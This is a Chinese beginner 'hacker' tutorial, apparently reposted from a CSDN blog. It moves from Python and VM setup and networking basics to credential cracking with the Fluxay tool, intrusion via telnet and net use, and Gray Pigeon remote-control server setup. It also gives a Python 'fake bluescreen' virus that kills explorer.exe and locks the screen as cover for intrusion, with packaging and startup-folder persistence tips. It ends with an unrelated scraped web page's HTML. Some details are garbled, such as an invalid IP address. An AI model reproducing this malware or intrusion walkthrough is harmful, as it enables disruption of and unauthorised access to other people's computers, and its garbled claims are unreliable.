Hacker（黑客），往往被人们理解为只会用非法手段来破坏网络安全的计算机高手。但是，黑客其实不是这样的，真正的“网络破坏者”是和黑客名称和读音相似的骇客。
骇客，是用黑客手段进行非法操作并为己取得利益的人。黑客，是用黑客手段为国家或单位做事的人。
那么，既然黑客不是一个很坏的职业，我们就可以去试着学习。

——黑客其实一直是善良的。 骇客其实他的前身就是黑客。
骇客与黑客分家，有这么一个故事：
原本，只有黑客一族。而不久后，有些黑客想用黑客手段来获取利益，不断被其他的黑客反对。于是，那些黑客悄悄私下成立了一个新的族群——骇客族。
骇客族产生后，一直处于保密状态，所以，没有人知道这个族。
直到有一天——
骇客族出现了一次大骚动：
不断的进行网络欺骗、流量攻击，盗取了很多人的账号，还修改了一些大型的搜索网站。
于是，从这天开始，黑骇（黑客和骇客）分家了。
黑客的初衷本是一些测试程序漏洞的计算机高手，他们还帮国家和单位做事。但是，人心总是贪婪，造成了骇客的诞生。
从此以后，防病毒产品诞生了。

在编写程序进行黑客攻击和病毒编写之前，我们得先安装我们的编程环境：Python3.7 IDE
从网络上下载：Python3.7 IDE

接着，双击它，按照安装向导完成安装。

在Windows搜索栏中搜索：Python
会显示出：

打开它！

我们现在还没有一个攻击目标，因为我们现在不能攻击别人的电脑，否则，你就是骇客了。
那么，我们只有安装VMware虚拟机了。
安装VMware Workstation player
（注：此处不细说，因为版本不一，安装不一样）
打开！

然后，请下载Windows 7 原生纯净镜像，可以百度，点击下载。

点击“创建新虚拟机”

点击“下一步”

这里需要输入Windows7的密钥，按图中输入。
下一步：

下一步：


我们已经完成了VMware Workstation 虚拟机的配置，现在我们启动它：



在这段时间内，计算机（虚拟机）会重启数次，最终完成安装。
安装成功后即可开始使用Windows 7 ，并且可以向它发起猛烈的攻击了。

Windows7是微软（Microsoft）的杰出产品之一，但可惜的是它还是被更优秀的Windows10取代。在2015年，微软（Microsoft）正式宣布不再支持Windows7，也就意味着，不会再有新的更新给使用Windows7的用户了。

启动成功！我们可以在这台Windows上工作，并且也可以攻击它了！

打开Python，点击File，New。
在弹出的窗口中输入：

print('Hello, World!')

点击Run，最后一个选项，查看结果。
显示：

Hello, World!

这表示IDE程序可用，也表示，你已经成为一名程序员了！

PING程序是Microsoft（微软公司）为Windows用户准备的网络检测程序，使用他，可以帮你查看网络状态和网络是否可访问。
键击“windows键+R”，打开运行窗口，输入cmd，回车，即可打开终端窗口。在这里，你可以做很多一般人做不到的事情。

在终端里输入ping/?,查看详细用法。

常用指令：
PING -t ip
注：这样可以PING指定的IP到永远，除非你停止它。很多初级黑客喜欢用这个参数来进行网络堵塞的攻击。
PING -l 大小 ip
注：这样可以设置发送包大小
PING -n 次数 ip
注：这样可以设置次数。

打开终端，输入PING -n 10 -l 10 baidu.com

(此命令必须在Windows 8以上才可以运行，Windows 7部分版本不支持PING网页)
我们检测到我们可以连接到baidu.com，说明我们的网络是可用的。

TCP/IP传输协议，即传输控制/网络协议，也叫作网络通讯协议。它是在网络的使用中的最基本的通信协议。TCP/IP传输协议对互联网中各部分进行通信的标准和方法进行了规定。并且，TCP/IP传输协议是保证网络数据信息及时、完整传输的两个重要的协议。TCP/IP传输协议是严格来说是一个四层的体系结构，应用层、传输层、网络层和数据链路层都包含其中。
TCP/IP协议是Internet最基本的协议,其中应用层的主要协议有Telnet、FTP、SMTP等，是用来接收来自传输层的数据或者按不同应用要求与方式将数据传输至传输层；传输层的主要协议有UDP、TCP，是使用者使用平台和计算机信息网内部数据结合的通道，可以实现数据传输与数据共享；网络层的主要协议有ICMP、IP、IGMP，主要负责网络中数据包的传送等；而网络访问层，也叫网路接口层或数据链路层，主要协议有ARP、RARP，主要功能是提供链路管理错误检测、对不同通信媒介有关信息细节问题进行有效处理等。
TCP/IP协议能够迅速发展起来并成为事实上的标准，是它恰好适应了世界范围内数据通信的需要。它有以下特点：
（1）协议标准是完全开放的，可以供用户免费使用，并且独立于特定的计算机硬件与操作系统。
（2）独立于网络硬件系统，可以运行在广域网，更适合于互联网。
（3）网络地址统一分配，网络中每一设备和终端都具有一个唯一地址。
（4）高层协议标准化，可以提供多种多样可靠网络服务。

IP协议
网络层引入了IP协议，制定了一套新地址，使得我们能够区分两台主机是否同属一个网络，这套地址就是网络地址，也就是所谓的IP地址。IP协议将这个32位的地址分为两部分，前面部分代表网络地址，后面部分表示该主机在局域网中的地址。如果两个IP地址在同一个子网内，则网络地址一定相同。为了判断IP地址中的网络地址，IP协议还引入了子网掩码，IP地址和子网掩码通过按位与运算后就可以得到网络地址。
ARP协议
即地址解析协议，是根据IP地址获取MAC地址的一个网络层协议。其工作原理如下：ARP首先会发起一个请求数据包，数据包的首部包含了目标主机的IP地址，然后这个数据包会在链路层进行再次包装，生成以太网数据包，最终由以太网广播给子网内的所有主机，每一台主机都会接收到这个数据包，并取出标头里的IP地址，然后和自己的IP地址进行比较，如果相同就返回自己的MAC地址，如果不同就丢弃该数据包。ARP接收返回消息，以此确定目标机的MAC地址；与此同时，ARP还会将返回的MAC地址与对应的IP地址存入本机ARP缓存中并保留一定时间，下次请求时直接查询ARP缓存以节约资源。
路由协议
首先通过IP协议来判断两台主机是否在同一个子网中，如果在同一个子网，就通过ARP协议查询对应的MAC地址，然后以广播的形式向该子网内的主机发送数据包；如果不在同一个子网，以太网会将该数据包转发给本子网的网关进行路由。网关是互联网上子网与子网之间的桥梁，所以网关会进行多次转发，最终将该数据包转发到目标IP所在的子网中，然后再通过ARP获取目标机MAC，最终也是通过广播形式将数据包发送给接收方。而完成这个路由协议的物理设备就是路由器，路由器扮演着交通枢纽的角色，它会根据信道情况，选择并设定路由，以最佳路径来转发数据包。
所以，网络层的主要工作是定义网络地址、区分网段、子网内MAC寻址、对于不同子网的数据包进行路由。

链路层定义了主机的身份，即MAC地址，而网络层定义了IP地址，明确了主机所在的网段，有了这两个地址，数据包就从可以从一个主机发送到另一台主机。但实际上数据包是从一个主机的某个应用程序发出，然后由对方主机的应用程序接收。而每台电脑都有可能同时运行着很多个应用程序，所以当数据包被发送到主机上以后，是无法确定哪个应用程序要接收这个包。因此传输层引入了UDP协议来解决这个问题，为了给每个应用程序标识身份。
UDP协议
UDP协议定义了端口，同一个主机上的每个应用程序都需要指定唯一的端口号，并且规定网络中传输的数据包必须加上端口信息，当数据包到达主机以后，就可以根据端口号找到对应的应用程序了。UDP协议比较简单，实现容易，但它没有确认机制，数据包一旦发出，无法知道对方是否收到，因此可靠性较差，为了解决这个问题，提高网络可靠性，TCP协议就诞生了。
TCP协议
TCP即传输控制协议，是一种面向连接的、可靠的、基于字节流的通信协议。简单来说TCP就是有确认机制的UDP协议，每发出一个数据包都要求确认，如果有一个数据包丢失，就收不到确认，发送方就必须重发这个数据包。为了保证传输的可靠性，TCP协议在UDP基础之上建立了三次对话的确认机制，即在正式收发数据前，必须和对方建立可靠的连接。TCP数据包和UDP一样，都是由首部和数据两部分组成，唯一不同的是，TCP数据包没有长度限制，理论上可以无限长，但是为了保证网络的效率，通常TCP数据包的长度不会超过IP数据包的长度，以确保单个TCP数据包不必再分割。
传输层的主要工作是定义端口，标识应用程序身份，实现端口到端口的通信，TCP协议可以保证数据传输的可靠性。

理论上讲，有了以上三层协议的支持，数据已经可以从一个主机上的应用程序传输到另一台主机的应用程序了，但此时传过来的数据是字节流，不能很好的被程序识别，操作性差，因此，应用层定义了各种各样的协议来规范数据格式，常见的有http,ftp,smtp等，在请求Header中，分别定义了请求数据格式Accept和响应数据格式Content-Type，有了这个规范以后，当对方接收到请求以后就知道该用什么格式来解析，然后对请求进行处理，最后按照请求方要求的格式将数据返回，请求端接收到响应后，就按照规定的格式进行解读。
所以应用层的主要工作就是定义数据格式并按照对应的格式解读数据。

1、“肉鸡”

“肉鸡”有点类似牵线木偶，是指可以被黑客神不知鬼不觉地远程控制的电脑或者大型服务器。不论什么系统都有可能沦为“肉鸡”。

2、“木马”

“木马”是一种在运行后可以得到系统的控制权的程序。拿网页木马举例，主要是利用浏览器的漏洞把网页木马搞到浏览器访问者本地上，然后自动执行的。

3、“后门”

黑客在通过某种手段成功控制目标主机之后，搞到系统的访问权限。访问系统后通过系统漏洞得到root权限，再安装rootkit，就可以较长时间地控制该目标主机。

4、“弱口令”

弱口令的安全强度不高，易于被猜到破解的密码，比如123456、654321。

5、“溢出”

“溢出”一般指的是缓冲区溢出。说白了，就是程序没有进行有效地监测，导致输入的数据没执行。这样的程序和没有执行的数据越来越多，最后程序会解体，也有可能错误地执行黑客的命令。

6、“花指令”

“花指令”是用汇编语言写成的，导致杀毒软件无法对病毒进行合理地判断。因为杀毒软件有顺序规则，就是从头到尾来查杀病毒。而一旦病毒的头尾顺序不对，杀毒软件就歇菜了。

7、“免杀”

“免杀”，顾名思义，就是免去杀毒软件的查杀。使用一些技术把程序进行修改，这些技术主要有加壳、加密、加花指令等。

8、“加壳”

“加壳”的目的主要有压缩文件、将程序编码加密、免杀等，主要通过一些不一般的算法改变可执行程序或者DLL动态链接库文件的编码。

9、“Shell”

“Shell”是一种程序或者命令的执行环境。比如，一般用远程溢出程序后，可以成功控制远程电脑，在该电脑执行系统命令的环境就是“Shell”。

系统，又名操作系统。是一个框架，给我们一个可视化的计算机。如果没有操作系统，我们使用计算机就会很麻烦，必须学会机器语言才可以和计算机交流。
著名的系统有Windows、Mac、Linux（CentOS）

不同的系统有不同的界面，就像小明和小红不是同一张脸一样。
在之前，我们安装了Windows7操作系统，在这里，我们再来看看Linux CentOS吧！
（安装不细说，可以百度）
界面如下:

它的界面和Windows截然不同。
Linux是一个开源的系统，它的功能远远强于Windows。但是，因为Linux操作复杂，更多的计算机用户还是选择了Windows。Linux在程序员和服务器那里出现的最多，因为它是个开源系统，完全开放，代码编写十分轻松。并且，它的兼容性很强。
系统编写大多数都是C++/C/C#，因为这些语言的兼容性和实用性较高，安全性较高。Windows 10的源码曾泄露到网上过，你会发现，一个系统的代码是多么庞大！
Linux默认都安装Python，因为Linux是一个开源系统，它就是用来码代码的。
我们安装了Linux，不是攻击它，而是使用它——使用它成为真正的黑客。

Windows系统有很多弱点，比如:
1，从系统构成上来说,Windows不是开源系统。那就意味着，如果你喜欢，你可以对开源的linux系统做你想做的任何改动。而这点对于Microsoft的Windows来说，是不可能的。
2，从运行的稳定性来说。Windows的程序不是相对独立的，软件的崩溃容易造成系统的瘫痪（死机）。所以，就造成了Windows经常容易玩完，所以，就天天重装系统。
3，漏洞较多，每天都要打补丁
4，从安全性来说，我们用Windows时，杀毒软件、防火墙、防垃圾软件、防间谍软件占去了大部分的系统资源。可这样还是防不胜防的。有谁没中过毒或木马、流氓软件呢？
5，垃圾难以清理，软件卸载不净，C盘越用越大，导致要经常重装系统。

打开Fluxay流光，界面如下:

流光是著名的黑客小榕的作品，大小黑客无一不用，因为用它，可以直接破解用户名和密码！
那么，我们点击文件，高级嗅探向导。

然后设置IP，后面的直接点下一步就可以了。
设置完毕，开始扫描！
（10Min…）
扫描好了，结果如下:

发现，我们破解了192.168.89.293的密码和用户名，我们就可以入侵它了。

我们得到用户名密码后，使用telnet,远程连接对方
接着，我们来写一个病毒，这是一个蓝屏病毒，运行后会蓝屏，在这里，我就不将病毒拷贝到C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp里了，如果你们想完成那样的效果，可以自己弄。
代码如下：

import tkinter as tk
from subprocess import run


def bluescreen():
    root = tk.Tk()
    root.attributes('-fullscreen', True)  # 全屏
    root.wm_attributes('-topmost', True)  # 置顶
    frame = tk.Frame(root, bg='darkblue') #设置颜色
    frame.pack(fill='both', expand=True)
    return root

def close_explorer():
    run('taskkill /F /IM explorer.exe')


if __name__ == '__main__':
    root = bluescreen()
    close_explorer()
    root.mainloop()

这其实是个假蓝屏，但因为很不容易退出，所以，我们可以把它当成一种“庇护”病毒——运行后，用户啥也看不见，我们可以为所欲为！
将其打包：
pyinstaller -F -w -i xxx xxxx.py
即可用来当作“庇护”病毒了。
好的，我们回到正路，我现在telnet对方……
成功！我现在进入了对方的计算机。
我们现在的权限是比较低的访客权限，因为这个计算机的主人设置了23端口的权限。我们现在只可以运行对方的程序和查看，不能更改。
好的，现在我们进入对方的C盘，看看它的文件。我们现在再回到我们的计算机，用net use命令远程入侵对方，这个命令不同于telnet，详细如下：

黄色的命令就是我们要用的，我们按照其中第二个的格式输入，回车！
我们即可查看对方的文件了。
而这里，我用黑客软件查看到了对方桌面的截图，如下：

看来这个人在寻找“方舟sheng”，估计一下，就在查找“方舟生存进化”，我们通过检测，就可以看到对方的一举一动。但是在今天，我们还不能告诉你我们是怎么做到的，但以后会。
现在，我们将病毒拷贝到对方C:，就可以了。

在这一篇里，将布满代码…

什么是勒索病毒？就是用一种方式使你的计算机“废”掉，就是不能用了，接着封锁你的文件，就要你支付一些钱来赎回文件。
在本篇里，我们不会进行制作，只作为了解。

“灰鸽子”和“冰河”一样，本意都是做出一款强大的连接软件，但可惜的是，它们最后都成为了黑客最爱用的工具。
在本章，我们将介绍灰鸽子，来进行我们的入侵。

下载灰鸽子后，点击安装。结束后，打开灰鸽子控制端。

部分防病毒产品会警告报毒，那是因为灰鸽子已被列入危险黑客程序之一，防病毒产品不让你被伤害，也不让你伤害别人。
打开后界面如下：

在Windows 10 专业版，Windows已经自带防病毒产品了，它的名字叫Windows Defender,它的界面如下：

接着，我们再来看看灰鸽子，首先，我们点击文件，打开服务器配置：

生成完服务器后，双击，即可上线。
关于灰鸽子的使用我们先说到这里，到后面我们继续说。

我们在上次交代了爬去Web源代码的方法，这次，我们再次来研究。
我们还是选择中国秦川联盟：

<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
	<!--  Verifications  -->
        <meta name="baidu-site-verification" content="lw65VVjI6w" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="msvalidate.01" content="2D76DBA9C0B07B52C5A4E01E9C544670" />
        <meta name="360-site-verification" content="f2b92e1ed29f39bd884ee129cccee90c" />
	<meta name='keywords' content="中国秦川联盟,秦川联盟">
	<meta name=description content="中国秦川联盟是一个综合性组织，批准创建了中国晨风社和雨墨局等组织。我们已经和天狼队、米兔联盟、红龙网络安全组织、FREET安全组和萤火虫网安等组织建立合作关系。" >
<link rel="shortcut icon" href="./static/favicon.ico" />
<title>中国秦川联盟</title>
	<meta name="google-site-verification" content="Z7G5Ye7l4HdXD3LNZgM64B2l6DxoF0nyOu6myi858yQ" />
	<meta name="shenma-site-verification" content="1fee56e1e4a8da6977eb295b4387a8a4_1566456372">
        <meta name="sogou_site_verification" content="L8vKDp4Gys"/>
<link rel="stylesheet" href="./static/fontawesome-5.5/css/all.min.css" />
<link rel="stylesheet" href="./static/slick/slick.css">
<link rel="stylesheet" href="./static/slick/slick-theme.css">
<link rel="stylesheet" href="./static/magnific-popup/magnific-popup.css">
<link rel="stylesheet" href="./static/css/bootstrap.min.css" />
<link rel="stylesheet" href="./static/css/templatemo-style.css" />

<script>
if(window.location.host!="www.qinnational.xyz"){                   redirect = "https://www.qinnational.xyz"+location.pathname;                                                           window.location = redirect;                        }
</script>

	<script>
		(function(){
			var src = "https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba";
			document.write('<script src="' + src + '" id="sozz"></script>');
				})();
	</script>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</head>
<body>    
<!-- Hero section -->

<style>
.declare-wrap {
    margin-top: -30px;
    background: #fff;
    display: none;
}
.declare {
    background: #f9f4d9;
    color: #8f7f5d;
    padding: 10px 15px;
    position: relative;
    *zoom: 1;
</style>
<section id="hero" class="text-white tm-font-big tm-parallax">
  <!-- Navigation -->
  <nav class="navbar navbar-expand-md tm-navbar" id="tmNav">              
	<div class="container">   
	  <div class="tm-next"><a href="#hero" class="navbar-brand">QUC</a></div>             
		
	  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
		<i class="fas fa-bars navbar-toggler-icon"></i>
	  </button>
	  <div class="collapse navbar-collapse" id="navbarSupportedContent">
		<ul class="navbar-nav ml-auto">
		  <li class="nav-item"> <a class="nav-link tm-nav-link" href="#introduction">关于</a> </li>
		  <li class="nav-item"> <a class="nav-link tm-nav-link" href="#work">解决方案</a> </li>
			
		  <li class="nav-item">
			  <a class="nav-link tm-nav-link" href="#contact">联系我们</a>
		  </li>                    
		</ul>
	  </div>        
	</div>
  </nav>
  <div class="text-center tm-hero-text-container">
	<div class="tm-hero-text-container-inner">
		<h2 class="tm-hero-title">中国秦川联盟</h2>
		<p class="tm-hero-subtitle">
		  Qinchuan Union of China
		</p>
	</div>        
  </div>
  <div class="tm-next tm-intro-next">
	<a href="#introduction" class="text-center tm-down-arrow-link">
	  <i class="fas fa-3x fa-caret-down tm-down-arrow"></i>
	</a>
  </div>      
</section>
  <script>
host = window.location.host;
if(host=='fu050409.gitee.io'){
document.write("<br><br><div class='declare-wrap' id='J-declare-wrap' style='display: block;'><div class='declare' id='J-declare'>注意：本站是由于百度无法收录主站而搭建，同步定期，但万一站长夏侯启懒一懒，就会忘记更新副站，最新内容详见<a class='declare-details' target='_blank' href='https://www.qinchuan.tk'>主站&gt;&gt;</a><div class='close-btn' id='J-declare-close'><em class='cmn-icon cmn-icons cmn-icons_close'></em></div></div></div><br><br>")
}
var u = navigator.userAgent;
 
//Android终端
var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Adr') > -1;
 
//iOS终端
var isiOS = !!u.match(/(i[^;]+;( U;)? CPU.+Mac OS X/); 
 
if(isiOS){
    //如果为iOS
document.write("<br><br><div class='declare-wrap' id='J-declare-wrap' style='display: block;'><div class='declare' id='J-declare'>注意：由于iOS屏蔽了一些插件，我们将在近期内结束对iOS系统的支持！请尽快更换安卓手机！<a class='declare-details' target='_blank' href='https://www.vmall.com/product/10086102942203.html'>华为P30购买&gt;&gt;</a><div class='close-btn' id='J-declare-close'><em class='cmn-icon cmn-icons cmn-icons_close'></em></div></div></div><br><br>")
}
	  
</script>
<section id="introduction" class="tm-section-pad-top">
  <div class="container">
	<div class="row">
	  <!--<div class="col-lg-6">
		<img src="" alt="Image" class="img-fluid tm-intro-img" />
	  </div>-->
	  <div class="col-lg-6">
		<div class="tm-intro-text-container">
		  <h2 class="tm-text-primary mb-4 tm-section-title">关于秦川联盟</h2>
		  <p class="mb-4 tm-intro-text">中国秦川联盟是一个大型综合性学术团体，包含有文学、数学、网络技术等多个方面。于2011年9月1日由夏侯启（代名）、子墨（简名）、李源（代名）等中国秦川联盟早期盟员在中华人民共和国陕西省西安市蓝田县创建。
		    2017年，首次提出了科技共产战略部署；2019年10月，由龙启发表了<a href="file/scholarly_program.html">《中国秦川联盟学术纲领》</a>，提出了学术支援战略、学术垄断战略、学术驱动发展战略等三大学术战略。
		    我们批准创建了中国晨风社、<a href="https://ym.agency.qinnational.xyz" id="ymiblink">雨墨情报局</a>、中国红云局等组织。
		    我们已经和天狼队、米兔联盟、<a href="http://hugozz.net3v.net">红龙网络安全组织</a>、<a href="https://www.freet.tk">Freet安全组</a>、<a href="https://firefliestudio.com">萤火虫网安</a>、<a href='http://gw.qlwltd.site'>QL网络团队</a>等组织建立学术合作关系。<br>
	      </p>
	
<div class="tm-next">
	    <a href="./static/announcement.html" class="tm-intro-text tm-btn-primary">公告</a>
		</div>
		</div>
	  </div>
	</div>
	<div class="row tm-section-pad-top">
	  <div class="col-lg-4">
<h4 class="text-center tm-text-primary mb-4">合作组织</h4>
		<p>
中国天狼队<br>
萤火虫网安（FireFlies’ Studio)
                            
                            版权声明：本文来源CSDN，感谢博主原创文章，遵循 CC 4.0 by-sa 版权协议，转载请附上原文出处链接和本声明。

                            原文链接：https://blog.csdn.net/tiantian520ttjs/article/details/103645750

                            站方申明：本站部分内容来自社区用户分享，若涉及侵权，请联系站方删除。